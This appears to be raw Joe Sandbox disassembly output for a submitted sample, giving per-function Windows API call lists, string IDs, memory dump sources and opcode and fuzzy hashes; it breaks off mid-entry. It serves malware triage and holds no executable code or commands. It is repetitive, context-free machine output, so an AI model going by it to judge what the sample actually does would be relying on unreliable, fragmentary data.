                                          • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                          APIs
                                          • CoInitialize.OLE32 ref: 0046C63A
                                          • CoUninitialize.OLE32 ref: 0046C645
                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                            • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                            • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                          • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                          • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                          • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                          • IIDFromString.OLE32(?,?), ref: 0046C705
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 2294789929-1287834457
                                          • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                          • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                          • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                          • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                          APIs
                                            • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                            • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                          • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                          • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                          • ImageList_EndDrag.COMCTL32 ref: 00471169
                                          • ReleaseCapture.USER32 ref: 0047116F
                                          • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                          • API String ID: 2483343779-2107944366
                                          • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                          • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                          • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                          • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                          • _wcslen.LIBCMT ref: 00450720
                                          • _wcscat.LIBCMT ref: 00450733
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                          • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat_wcslen
                                          • String ID: -----$SysListView32
                                          • API String ID: 4008455318-3975388722
                                          • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                          • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                          • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                          • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                          APIs
                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                          • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                          • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                          • GetParent.USER32 ref: 00469C98
                                          • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                          • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                          • GetParent.USER32 ref: 00469CBC
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 2360848162-1403004172
                                          • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                          • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                          • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                          • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                          • String ID:
                                          • API String ID: 262282135-0
                                          • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                          • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                          • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                          • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                          APIs
                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                          • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                          • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                          • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                          • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                          • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$LongWindow
                                          • String ID:
                                          • API String ID: 312131281-0
                                          • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                          • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                          • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                          • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                          APIs
                                            • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                          • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                          • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                            • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                          • String ID:
                                          • API String ID: 3771399671-0
                                          • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                          • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                          • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                          • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00434643
                                          • GetForegroundWindow.USER32(00000000), ref: 00434655
                                          • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                          • String ID:
                                          • API String ID: 2156557900-0
                                          • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                          • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                          • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                          • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                          • API String ID: 0-1603158881
                                          • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                          • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                          • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                          • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                          APIs
                                          • CreateMenu.USER32 ref: 00448603
                                          • SetMenu.USER32(?,00000000), ref: 00448613
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                          • IsMenu.USER32(?), ref: 004486AB
                                          • CreatePopupMenu.USER32 ref: 004486B5
                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                          • DrawMenuBar.USER32 ref: 004486F5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                          • String ID: 0
                                          • API String ID: 161812096-4108050209
                                          • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                          • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                          • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                          • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                          • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                          • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                          • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                          APIs
                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                          • MoveFileW.KERNEL32(?,?), ref: 00453932
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                          • String ID:
                                          • API String ID: 978794511-0
                                          • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                          • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                          • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                          • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                          • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                          • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                          • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: ClearVariant
                                          • String ID:
                                          • API String ID: 1473721057-0
                                          • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                          • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                          • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                          • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1724941563.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1724852059.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725014754.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725060082.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725131576.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725211663.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1725291212.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_uFzZ48M67c.jbxd
                                          Similarity
                                          • API ID: _memmove$_memcmp
                                          • String ID: '$\$h
                                          • API String ID: 2205784470-1303700344
                                          • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                          • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
